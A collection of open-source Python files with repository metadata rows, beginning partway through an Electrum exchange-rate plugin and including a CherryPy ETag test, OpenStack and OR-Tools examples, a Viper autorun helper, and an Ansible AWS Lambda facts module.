lenprices = len(winkresp["prices"])
usdprice = winkresp["prices"][lenprices-1]["y"]
try:
quote_currencies["USD"] = decimal.Decimal(usdprice)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_cv(self):
try:
jsonresp = self.get_json('www.cavirtex.com', "/api/CAD/ticker.json")
except Exception:
return
quote_currencies = {"CAD": 0.0}
cadprice = jsonresp["last"]
try:
quote_currencies["CAD"] = decimal.Decimal(cadprice)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_CNY(self):
try:
jsonresp = self.get_json('data.btcchina.com', "/data/ticker")
except Exception:
return
quote_currencies = {"CNY": 0.0}
cnyprice = jsonresp["ticker"]["last"]
try:
quote_currencies["CNY"] = decimal.Decimal(cnyprice)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_bp(self):
try:
jsonresp = self.get_json('bitpay.com', "/api/rates")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
quote_currencies[str(r["code"])] = decimal.Decimal(r["rate"])
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_cb(self):
try:
jsonresp = self.get_json('coinbase.com', "/api/v1/currencies/exchange_rates")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
if r[:7] == "btc_to_":
quote_currencies[r[7:].upper()] = self._lookup_rate_cb(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_bc(self):
try:
jsonresp = self.get_json('blockchain.info', "/ticker")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
quote_currencies[r] = self._lookup_rate(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
# print "updating exchange rate", self.quote_currencies["USD"]
def update_lb(self):
try:
jsonresp = self.get_json('localbitcoins.com', "/bitcoinaverage/ticker-all-currencies/")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
quote_currencies[r] = self._lookup_rate_lb(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_bv(self):
try:
jsonresp = self.get_json('api.bitcoinvenezuela.com', "/")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp["BTC"]:
quote_currencies[r] = Decimal(jsonresp["BTC"][r])
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def update_ba(self):
try:
jsonresp = self.get_json('api.bitcoinaverage.com', "/ticker/global/all")
except Exception:
return
quote_currencies = {}
try:
for r in jsonresp:
if not r == "timestamp":
quote_currencies[r] = self._lookup_rate_ba(jsonresp, r)
with self.lock:
self.quote_currencies = quote_currencies
except KeyError:
pass
self.parent.set_currencies(quote_currencies)
def get_currencies(self):
return [] if self.quote_currencies == None else sorted(self.quote_currencies.keys())
def _lookup_rate(self, response, quote_id):
return decimal.Decimal(str(response[str(quote_id)]["15m"]))
def _lookup_rate_cb(self, response, quote_id):
return decimal.Decimal(str(response[str(quote_id)]))
def _lookup_rate_ba(self, response, quote_id):
return decimal.Decimal(response[str(quote_id)]["last"])
def _lookup_rate_lb(self, response, quote_id):
return decimal.Decimal(response[str(quote_id)]["rates"]["last"])
class Plugin(BasePlugin):
def fullname(self):
return "Exchange rates"
def description(self):
return """exchange rates, retrieved from blockchain.info, CoinDesk, or Coinbase"""
def __init__(self,a,b):
BasePlugin.__init__(self,a,b)
self.currencies = [self.config.get('currency', "EUR")]
self.exchanges = [self.config.get('use_exchange', "Blockchain")]
def init(self):
self.win = self.gui.main_window
self.win.connect(self.win, SIGNAL("refresh_currencies()"), self.win.update_status)
self.btc_rate = Decimal(0.0)
# Do price discovery
self.exchanger = Exchanger(self)
self.exchanger.start()
self.gui.exchanger = self.exchanger #
def set_currencies(self, currency_options):
self.currencies = sorted(currency_options)
self.win.emit(SIGNAL("refresh_currencies()"))
self.win.emit(SIGNAL("refresh_currencies_combo()"))
def set_quote_text(self, btc_balance, r):
r[0] = self.create_quote_text(Decimal(btc_balance) / 100000000)
def create_quote_text(self, btc_balance):
quote_currency = self.config.get("currency", "EUR")
self.exchanger.use_exchange = self.config.get("use_exchange", "Blockchain")
cur_rate = self.exchanger.exchange(Decimal(1.0), quote_currency)
if cur_rate is None:
quote_text = ""
else:
quote_balance = btc_balance * Decimal(cur_rate)
self.btc_rate = cur_rate
quote_text = "%.2f %s" % (quote_balance, quote_currency)
return quote_text
def load_wallet(self, wallet):
self.wallet = wallet
tx_list = {}
for item in self.wallet.get_tx_history(self.wallet.storage.get("current_account", None)):
tx_hash, conf, is_mine, value, fee, balance, timestamp = item
tx_list[tx_hash] = {'value': value, 'timestamp': timestamp, 'balance': balance}
self.tx_list = tx_list
def requires_settings(self):
return True
def toggle(self):
out = BasePlugin.toggle(self)
self.win.update_status()
return out
def close(self):
self.exchanger.stop()
def history_tab_update(self):
if self.config.get('history_rates', 'unchecked') == "checked":
try:
tx_list = self.tx_list
except Exception:
return
try:
mintimestr = datetime.datetime.fromtimestamp(int(min(tx_list.items(), key=lambda x: x[1]['timestamp'])[1]['timestamp'])).strftime('%Y-%m-%d')
except ValueError:
return
maxtimestr = datetime.datetime.now().strftime('%Y-%m-%d')
try:
resp_hist = self.exchanger.get_json('api.coindesk.com', "/v1/bpi/historical/close.json?start=" + mintimestr + "&end=" + maxtimestr)
except Exception:
return
self.gui.main_window.is_edit = True
self.gui.main_window.history_list.setColumnCount(6)
self.gui.main_window.history_list.setHeaderLabels( [ '', _('Date'), _('Description') , _('Amount'), _('Balance'), _('Fiat Amount')] )
root = self.gui.main_window.history_list.invisibleRootItem()
childcount = root.childCount()
for i in range(childcount):
item = root.child(i)
try:
tx_info = tx_list[str(item.data(0, Qt.UserRole).toPyObject())]
except Exception:
newtx = self.wallet.get_tx_history()
v = newtx[[x[0] for x in newtx].index(str(item.data(0, Qt.UserRole).toPyObject()))][3]
tx_info = {'timestamp':int(datetime.datetime.now().strftime("%s")), 'value': v }
pass
tx_time = int(tx_info['timestamp'])
tx_time_str = datetime.datetime.fromtimestamp(tx_time).strftime('%Y-%m-%d')
try:
tx_USD_val = "%.2f %s" % (Decimal(tx_info['value']) / 100000000 * Decimal(resp_hist['bpi'][tx_time_str]), "USD")
except KeyError:
tx_USD_val = "%.2f %s" % (self.btc_rate * Decimal(tx_info['value'])/100000000 , "USD")
item.setText(5, tx_USD_val)
if Decimal(tx_info['value']) < 0:
item.setForeground(5, QBrush(QColor("#BC1E1E")))
for i, width in enumerate(self.gui.main_window.column_widths['history']):
self.gui.main_window.history_list.setColumnWidth(i, width)
self.gui.main_window.history_list.setColumnWidth(4, 140)
self.gui.main_window.history_list.setColumnWidth(5, 120)
self.gui.main_window.is_edit = False
def settings_widget(self, window):
return EnterButton(_('Settings'), self.settings_dialog)
def settings_dialog(self):
d = QDialog()
layout = QGridLayout(d)
layout.addWidget(QLabel(_('Exchange rate API: ')), 0, 0)
layout.addWidget(QLabel(_('Currency: ')), 1, 0)
layout.addWidget(QLabel(_('History Rates: ')), 2, 0)
combo = QComboBox()
combo_ex = QComboBox()
hist_checkbox = QCheckBox()
hist_checkbox.setEnabled(False)
if self.config.get('history_rates', 'unchecked') == 'unchecked':
hist_checkbox.setChecked(False)
else:
hist_checkbox.setChecked(True)
ok_button = QPushButton(_("OK"))
def on_change(x):
try:
cur_request = str(self.currencies[x])
except Exception:
return
if cur_request != self.config.get('currency', "EUR"):
self.config.set_key('currency', cur_request, True)
if cur_request == "USD" and self.config.get('use_exchange', "Blockchain") == "CoinDesk":
hist_checkbox.setEnabled(True)
else:
hist_checkbox.setChecked(False)
hist_checkbox.setEnabled(False)
self.win.update_status()
def disable_check():
hist_checkbox.setChecked(False)
hist_checkbox.setEnabled(False)
def on_change_ex(x):
cur_request = str(self.exchanges[x])
if cur_request != self.config.get('use_exchange', "Blockchain"):
self.config.set_key('use_exchange', cur_request, True)
self.currencies = []
combo.clear()
self.exchanger.query_rates.set()
if cur_request == "CoinDesk":
if self.config.get('currency', "EUR") == "USD":
hist_checkbox.setEnabled(True)
else:
disable_check()
else:
disable_check()
set_currencies(combo)
self.win.update_status()
def on_change_hist(checked):
if checked:
self.config.set_key('history_rates', 'checked')
self.history_tab_update()
else:
self.config.set_key('history_rates', 'unchecked')
self.gui.main_window.history_list.setHeaderLabels( [ '', _('Date'), _('Description') , _('Amount'), _('Balance')] )
self.gui.main_window.history_list.setColumnCount(5)
for i,width in enumerate(self.gui.main_window.column_widths['history']):
self.gui.main_window.history_list.setColumnWidth(i, width)
def set_hist_check(hist_checkbox):
if self.config.get('use_exchange', "Blockchain") == "CoinDesk":
hist_checkbox.setEnabled(True)
else:
hist_checkbox.setEnabled(False)
def set_currencies(combo):
current_currency = self.config.get('currency', "EUR")
try:
combo.clear()
except Exception:
return
combo.addItems(self.currencies)
try:
index = self.currencies.index(current_currency)
except Exception:
index = 0
combo.setCurrentIndex(index)
def set_exchanges(combo_ex):
try:
combo_ex.clear()
except Exception:
return
combo_ex.addItems(self.exchanges)
try:
index = self.exchanges.index(self.config.get('use_exchange', "Blockchain"))
except Exception:
index = 0
combo_ex.setCurrentIndex(index)
def ok_clicked():
d.accept();
set_exchanges(combo_ex)
set_currencies(combo)
set_hist_check(hist_checkbox)
combo.currentIndexChanged.connect(on_change)
combo_ex.currentIndexChanged.connect(on_change_ex)
hist_checkbox.stateChanged.connect(on_change_hist)
combo.connect(self.win, SIGNAL('refresh_currencies_combo()'), lambda: set_currencies(combo))
combo_ex.connect(d, SIGNAL('refresh_exchanges_combo()'), lambda: set_exchanges(combo_ex))
ok_button.clicked.connect(lambda: ok_clicked())
layout.addWidget(combo,1,1)
layout.addWidget(combo_ex,0,1)
layout.addWidget(hist_checkbox,2,1)
layout.addWidget(ok_button,3,1)
if d.exec_():
return True
else:
return False
| marlengit/electrum198 | plugins/exchange_rate.py | Python | gpl-3.0 | 18,608 | 0.00489 |
import cherrypy
from cherrypy.test import helper
class ETagTest(helper.CPWebCase):
def setup_server():
class Root:
def resource(self):
return "Oh wah ta goo Siam."
resource.exposed = True
def fail(self, code):
code = int(code)
if 300 <= code <= 399:
raise cherrypy.HTTPRedirect([], code)
else:
raise cherrypy.HTTPError(code)
fail.exposed = True
def unicoded(self):
return u'I am a \u1ee4nicode string.'
unicoded.exposed = True
unicoded._cp_config = {'tools.encode.on': True}
conf = {'/': {'tools.etags.on': True,
'tools.etags.autotags': True,
}}
cherrypy.tree.mount(Root(), config=conf)
setup_server = staticmethod(setup_server)
def test_etags(self):
self.getPage("/resource")
self.assertStatus('200 OK')
self.assertHeader('Content-Type', 'text/html;charset=utf-8')
self.assertBody('Oh wah ta goo Siam.')
etag = self.assertHeader('ETag')
# Test If-Match (both valid and invalid)
self.getPage("/resource", headers=[('If-Match', etag)])
self.assertStatus("200 OK")
self.getPage("/resource", headers=[('If-Match', "*")])
self.assertStatus("200 OK")
self.getPage("/resource", headers=[('If-Match', "*")], method="POST")
self.assertStatus("200 OK")
self.getPage("/resource", headers=[('If-Match', "a bogus tag")])
self.assertStatus("412 Precondition Failed")
# Test If-None-Match (both valid and invalid)
self.getPage("/resource", headers=[('If-None-Match', etag)])
self.assertStatus(304)
self.getPage("/resource", method='POST', headers=[('If-None-Match', etag)])
self.assertStatus("412 Precondition Failed")
self.getPage("/resource", headers=[('If-None-Match', "*")])
self.assertStatus(304)
self.getPage("/resource", headers=[('If-None-Match', "a bogus tag")])
self.assertStatus("200 OK")
def test_errors(self):
self.getPage("/resource")
self.assertStatus(200)
etag = self.assertHeader('ETag')
# Test raising errors in page handler
self.getPage("/fail/412", headers=[('If-Match', etag)])
self.assertStatus(412)
self.getPage("/fail/304", headers=[('If-Match', etag)])
self.assertStatus(304)
self.getPage("/fail/412", headers=[('If-None-Match', "*")])
self.assertStatus(412)
self.getPage("/fail/304", headers=[('If-None-Match', "*")])
self.assertStatus(304)
def test_unicode_body(self):
self.getPage("/unicoded")
self.assertStatus(200)
etag1 = self.assertHeader('ETag')
self.getPage("/unicoded", headers=[('If-Match', etag1)])
self.assertStatus(200)
self.assertHeader('ETag', etag1)
| evilhero/mylar | lib/cherrypy/test/test_etags.py | Python | gpl-3.0 | 3,071 | 0.003256 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from examples.connect import FLAVOR_NAME
from examples.connect import IMAGE_NAME
from examples.connect import NETWORK_NAME
from examples.connect import SERVER_NAME
"""
Managing profiles in the Cluster service.
For a full guide see
https://developer.openstack.org/sdks/python/openstacksdk/users/guides/cluster.html
"""
def list_profiles(conn):
print("List Profiles:")
for profile in conn.cluster.profiles():
print(profile.to_dict())
for profile in conn.cluster.profiles(sort='name:asc'):
print(profile.to_dict())
def create_profile(conn):
print("Create Profile:")
spec = {
'profile': 'os.nova.server',
'version': 1.0,
'properties': {
'name': SERVER_NAME,
'flavor': FLAVOR_NAME,
'image': IMAGE_NAME,
'networks': {
'network': NETWORK_NAME
}
}
}
profile = conn.cluster.create_profile('os_server', spec)
print(profile.to_dict())
def get_profile(conn):
print("Get Profile:")
profile = conn.cluster.get_profile('os_server')
print(profile.to_dict())
def find_profile(conn):
print("Find Profile:")
profile = conn.cluster.find_profile('os_server')
print(profile.to_dict())
def update_profile(conn):
print("Update Profile:")
profile = conn.cluster.update_profile('os_server', name='old_server')
print(profile.to_dict())
def delete_profile(conn):
print("Delete Profile:")
conn.cluster.delete_profile('os_server')
print("Profile deleted.")
| briancurtin/python-openstacksdk | examples/cluster/profile.py | Python | apache-2.0 | 2,100 | 0 |
# coding: utf-8
from django.db import models
class Band(models.Model):
name = models.CharField(max_length=100)
bio = models.TextField()
rank = models.IntegerField()
class Meta:
ordering = ('name',)
| adviti/melange | thirdparty/google_appengine/lib/django_1_2/tests/regressiontests/admin_ordering/models.py | Python | apache-2.0 | 224 | 0.004464 |
#!/usr/bin/env python3
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from SetupTools.SetupConfig import SetupConfig
from Interface.Interface import Interface
import importlib
import logging
class Previewer:
def __init__(self):
logging.basicConfig(filename='ArchSetup.preview.log', level=logging.DEBUG, format='%(asctime)s - [%(relativeCreated)6d] - %(name)s - %(levelname)s - %(message)s')
self.setupconfig = SetupConfig()
self.interface = Interface(self.callback)
self.interface.loop()
def callback(self, event):
if event == 'init':
self.windows = []
self.window_index = 0
for x in sys.argv[1:]:
i = importlib.import_module("Interface.Windows."+x)
cl = getattr(i, x)
self.windows.append(cl(self.callback, self.setupconfig))
self.interface.addwin(self.windows[self.window_index])
elif event == 'prev':
self.window_index -= 1
self.interface.addwin(self.windows[self.window_index])
elif event == 'next':
self.window_index += 1
if self.window_index == len(self.windows):
self.interface.exit()
return
self.interface.addwin(self.windows[self.window_index])
if __name__ == "__main__":
Previewer()
| mame98/ArchSetup | scripts/debug-preview.py | Python | gpl-3.0 | 1,383 | 0.005061 |
#!/usr/bin/env python3
# Copyright 2010-2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple VRP with special locations which need to be visited at end of the route."""
# [START import]
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
# [END import]
def create_data_model():
"""Stores the data for the problem."""
data = {}
# Special location don't consume token, while regular one consume one
data['tokens'] = [
0, # 0 depot
0, # 1 special node
0, # 2 special node
0, # 3 special node
0, # 4 special node
0, # 5 special node
-1, # 6
-1, # 7
-1, # 8
-1, # 9
-1, # 10
-1, # 11
-1, # 12
-1, # 13
-1, # 14
-1, # 15
-1, # 16
-1, # 17
-1, # 18
]
# just need to be big enough, not a limiting factor
data['vehicle_tokens'] = [20, 20, 20, 20]
data['num_vehicles'] = 4
data['depot'] = 0
return data
def print_solution(manager, routing, solution):
"""Prints solution on console."""
print(f'Objective: {solution.ObjectiveValue()}')
token_dimension = routing.GetDimensionOrDie('Token')
total_distance = 0
total_token = 0
for vehicle_id in range(manager.GetNumberOfVehicles()):
plan_output = f'Route for vehicle {vehicle_id}:\n'
index = routing.Start(vehicle_id)
total_token += solution.Value(token_dimension.CumulVar(index))
route_distance = 0
route_token = 0
while not routing.IsEnd(index):
node_index = manager.IndexToNode(index)
token_var = token_dimension.CumulVar(index)
route_token = solution.Value(token_var)
plan_output += f' {node_index} Token({route_token}) -> '
previous_index = index
index = solution.Value(routing.NextVar(index))
route_distance += routing.GetArcCostForVehicle(
previous_index, index, vehicle_id)
node_index = manager.IndexToNode(index)
token_var = token_dimension.CumulVar(index)
route_token = solution.Value(token_var)
plan_output += f' {node_index} Token({route_token})\n'
plan_output += f'Distance of the route: {route_distance}m\n'
total_distance += route_distance
print(plan_output)
print('Total distance of all routes: {}m'.format(total_distance))
print('Total token of all routes: {}'.format(total_token))
def main():
"""Solve the CVRP problem."""
# Instantiate the data problem.
data = create_data_model()
# Create the routing index manager.
manager = pywrapcp.RoutingIndexManager(len(data['tokens']),
data['num_vehicles'], data['depot'])
# Create Routing Model.
routing = pywrapcp.RoutingModel(manager)
# Create and register a transit callback.
def distance_callback(from_index, to_index):
"""Returns the distance between the two nodes."""
del from_index
del to_index
return 10
transit_callback_index = routing.RegisterTransitCallback(distance_callback)
routing.AddDimension(
transit_callback_index,
0, # null slack
3000, # maximum distance per vehicle
True, # start cumul to zero
'distance')
distance_dimension = routing.GetDimensionOrDie('distance')
distance_dimension.SetGlobalSpanCostCoefficient(100)
# Define cost of each arc.
routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
# Add Token constraint.
def token_callback(from_index):
"""Returns the number of token consumed by the node."""
# Convert from routing variable Index to tokens NodeIndex.
from_node = manager.IndexToNode(from_index)
return data['tokens'][from_node]
token_callback_index = routing.RegisterUnaryTransitCallback(token_callback)
routing.AddDimensionWithVehicleCapacity(
token_callback_index,
0, # null capacity slack
data['vehicle_tokens'], # vehicle maximum tokens
False, # start cumul to zero
'Token')
# Add constraint: special node can only be visited if token remaining is zero
token_dimension = routing.GetDimensionOrDie('Token')
for node in range(1, 6):
index = manager.NodeToIndex(node)
routing.solver().Add(token_dimension.CumulVar(index) == 0)
# Instantiate route start and end times to produce feasible times.
# [START depot_start_end_times]
for i in range(manager.GetNumberOfVehicles()):
routing.AddVariableMinimizedByFinalizer(
token_dimension.CumulVar(routing.Start(i)))
routing.AddVariableMinimizedByFinalizer(
token_dimension.CumulVar(routing.End(i)))
# [END depot_start_end_times]
# Setting first solution heuristic.
search_parameters = pywrapcp.DefaultRoutingSearchParameters()
search_parameters.first_solution_strategy = (
routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
search_parameters.local_search_metaheuristic = (
routing_enums_pb2.LocalSearchMetaheuristic.GUIDED_LOCAL_SEARCH)
search_parameters.time_limit.FromSeconds(1)
# Solve the problem.
solution = routing.SolveWithParameters(search_parameters)
# Print solution on console.
# [START print_solution]
if solution:
print_solution(manager, routing, solution)
else:
print('No solution found !')
# [END print_solution]
if __name__ == '__main__':
main()
| google/or-tools | ortools/constraint_solver/samples/vrp_tokens.py | Python | apache-2.0 | 6,133 | 0.000326 |
# -*- coding: utf-8 -*-
# This file is part of Viper - https://github.com/viper-framework/viper
# See the file 'LICENSE' for copying permission.
from viper.common.out import print_info
from viper.common.out import print_error
from viper.common.out import print_output
from viper.core.plugins import __modules__
from viper.core.session import __sessions__
from viper.core.database import Database
from viper.core.config import __config__
from viper.core.storage import get_sample_path
cfg = __config__
def parse_commands(data):
root = ''
args = []
words = data.split()
root = words[0]
if len(words) > 1:
args = words[1:]
return root, args
def autorun_module(file_hash):
if not file_hash:
return
if not __sessions__.is_set():
__sessions__.new(get_sample_path(file_hash))
for cmd_line in cfg.autorun.commands.split(','):
split_commands = cmd_line.split(';')
for split_command in split_commands:
split_command = split_command.strip()
if not split_command:
continue
root, args = parse_commands(split_command)
try:
if root in __modules__:
print_info("Running command \"{0}\"".format(split_command))
module = __modules__[root]['obj']()
module.set_commandline(args)
module.run()
if cfg.modules.store_output and __sessions__.is_set():
Database().add_analysis(file_hash, split_command, module.output)
if cfg.autorun.verbose:
print_output(module.output)
del(module.output[:])
else:
print_error("\"{0}\" is not a valid command. Please check your viper.conf file.".format(cmd_line))
except:
print_error("Viper was unable to complete the command {0}".format(cmd_line))
| kevthehermit/viper | viper/common/autorun.py | Python | bsd-3-clause | 1,981 | 0.002019 |
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: lambda_facts
short_description: Gathers AWS Lambda function details as Ansible facts
description:
- Gathers various details related to Lambda functions, including aliases, versions and event source mappings.
Use module M(lambda) to manage the lambda function itself, M(lambda_alias) to manage function aliases and
M(lambda_event) to manage lambda event source mappings.
version_added: "2.2"
options:
query:
description:
- Specifies the resource type for which to gather facts. Leave blank to retrieve all facts.
required: true
choices: [ "aliases", "all", "config", "mappings", "policy", "versions" ]
default: "all"
function_name:
description:
- The name of the lambda function for which facts are requested.
aliases: [ "function", "name"]
event_source_arn:
description:
- For query type 'mappings', this is the Amazon Resource Name (ARN) of the Amazon Kinesis or DynamoDB stream.
author: Pierre Jodouin (@pjodouin)
requirements:
- boto3
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
---
# Simple example of listing all info for a function
- name: List all for a specific function
lambda_facts:
query: all
function_name: myFunction
register: my_function_details
# List all versions of a function
- name: List function versions
lambda_facts:
query: versions
function_name: myFunction
register: my_function_versions
# List all lambda function versions
- name: List all function
lambda_facts:
query: all
max_items: 20
- name: show Lambda facts
debug:
var: lambda_facts
'''
RETURN = '''
---
lambda_facts:
description: lambda facts
returned: success
type: dict
lambda_facts.function:
description: lambda function list
returned: success
type: dict
lambda_facts.function.TheName:
description: lambda function information, including event, mapping, and version information
returned: success
type: dict
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, get_aws_connection_info, boto3_conn
import json
import datetime
import sys
import re
try:
from botocore.exceptions import ClientError
except ImportError:
pass # protected by AnsibleAWSModule
def fix_return(node):
"""
fixup returned dictionary
:param node:
:return:
"""
if isinstance(node, datetime.datetime):
node_value = str(node)
elif isinstance(node, list):
node_value = [fix_return(item) for item in node]
elif isinstance(node, dict):
node_value = dict([(item, fix_return(node[item])) for item in node.keys()])
else:
node_value = node
return node_value
def alias_details(client, module):
"""
Returns list of aliases for a specified function.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
params = dict()
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
params['Marker'] = module.params.get('next_marker')
try:
lambda_facts.update(aliases=client.list_aliases(FunctionName=function_name, **params)['Aliases'])
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(aliases=[])
else:
module.fail_json_aws(e, msg="Trying to get aliases")
else:
module.fail_json(msg='Parameter function_name required for query=aliases.')
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def all_details(client, module):
"""
Returns all lambda related facts.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
if module.params.get('max_items') or module.params.get('next_marker'):
module.fail_json(msg='Cannot specify max_items nor next_marker for query=all.')
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
lambda_facts[function_name] = {}
lambda_facts[function_name].update(config_details(client, module)[function_name])
lambda_facts[function_name].update(alias_details(client, module)[function_name])
lambda_facts[function_name].update(policy_details(client, module)[function_name])
lambda_facts[function_name].update(version_details(client, module)[function_name])
lambda_facts[function_name].update(mapping_details(client, module)[function_name])
else:
lambda_facts.update(config_details(client, module))
return lambda_facts
def config_details(client, module):
"""
Returns configuration details for one or all lambda functions.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
try:
lambda_facts.update(client.get_function_configuration(FunctionName=function_name))
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(function={})
else:
module.fail_json_aws(e, msg="Trying to get {0} configuration".format(function_name))
else:
params = dict()
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
params['Marker'] = module.params.get('next_marker')
try:
lambda_facts.update(function_list=client.list_functions(**params)['Functions'])
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(function_list=[])
else:
module.fail_json_aws(e, msg="Trying to get function list")
functions = dict()
for func in lambda_facts.pop('function_list', []):
functions[func['FunctionName']] = camel_dict_to_snake_dict(func)
return functions
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def mapping_details(client, module):
"""
Returns all lambda event source mappings.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
params = dict()
function_name = module.params.get('function_name')
if function_name:
params['FunctionName'] = module.params.get('function_name')
if module.params.get('event_source_arn'):
params['EventSourceArn'] = module.params.get('event_source_arn')
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
params['Marker'] = module.params.get('next_marker')
try:
lambda_facts.update(mappings=client.list_event_source_mappings(**params)['EventSourceMappings'])
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(mappings=[])
else:
module.fail_json_aws(e, msg="Trying to get source event mappings")
if function_name:
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
return camel_dict_to_snake_dict(lambda_facts)
def policy_details(client, module):
"""
Returns policy attached to a lambda function.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
if module.params.get('max_items') or module.params.get('next_marker'):
module.fail_json(msg='Cannot specify max_items nor next_marker for query=policy.')
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
try:
# get_policy returns a JSON string so must convert to dict before reassigning to its key
lambda_facts.update(policy=json.loads(client.get_policy(FunctionName=function_name)['Policy']))
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(policy={})
else:
module.fail_json_aws(e, msg="Trying to get {0} policy".format(function_name))
else:
module.fail_json(msg='Parameter function_name required for query=policy.')
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def version_details(client, module):
"""
Returns all lambda function versions.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
params = dict()
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
params['Marker'] = module.params.get('next_marker')
try:
lambda_facts.update(versions=client.list_versions_by_function(FunctionName=function_name, **params)['Versions'])
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(versions=[])
else:
module.fail_json_aws(e, msg="Trying to get {0} versions".format(function_name))
else:
module.fail_json(msg='Parameter function_name required for query=versions.')
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def main():
"""
Main entry point.
:return dict: ansible facts
"""
argument_spec = dict(
function_name=dict(required=False, default=None, aliases=['function', 'name']),
query=dict(required=False, choices=['aliases', 'all', 'config', 'mappings', 'policy', 'versions'], default='all'),
event_source_arn=dict(required=False, default=None)
)
module = AnsibleAWSModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[],
required_together=[]
)
# validate function_name if present
function_name = module.params['function_name']
if function_name:
if not re.search(r"^[\w\-:]+$", function_name):
module.fail_json(
msg='Function name {0} is invalid. Names must contain only alphanumeric characters and hyphens.'.format(function_name)
)
if len(function_name) > 64:
module.fail_json(msg='Function name "{0}" exceeds 64 character limit'.format(function_name))
try:
region, endpoint, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
aws_connect_kwargs.update(dict(region=region,
endpoint=endpoint,
conn_type='client',
resource='lambda'
))
client = boto3_conn(module, **aws_connect_kwargs)
except ClientError as e:
module.fail_json_aws(e, "trying to set up boto connection")
this_module = sys.modules[__name__]
invocations = dict(
aliases='alias_details',
all='all_details',
config='config_details',
mappings='mapping_details',
policy='policy_details',
versions='version_details',
)
this_module_function = getattr(this_module, invocations[module.params['query']])
all_facts = fix_return(this_module_function(client, module))
results = dict(ansible_facts={'lambda_facts': {'function': all_facts}}, changed=False)
if module.check_mode:
results['msg'] = 'Check mode set but ignored for fact gathering only.'
module.exit_json(**results)
if __name__ == '__main__':
main()
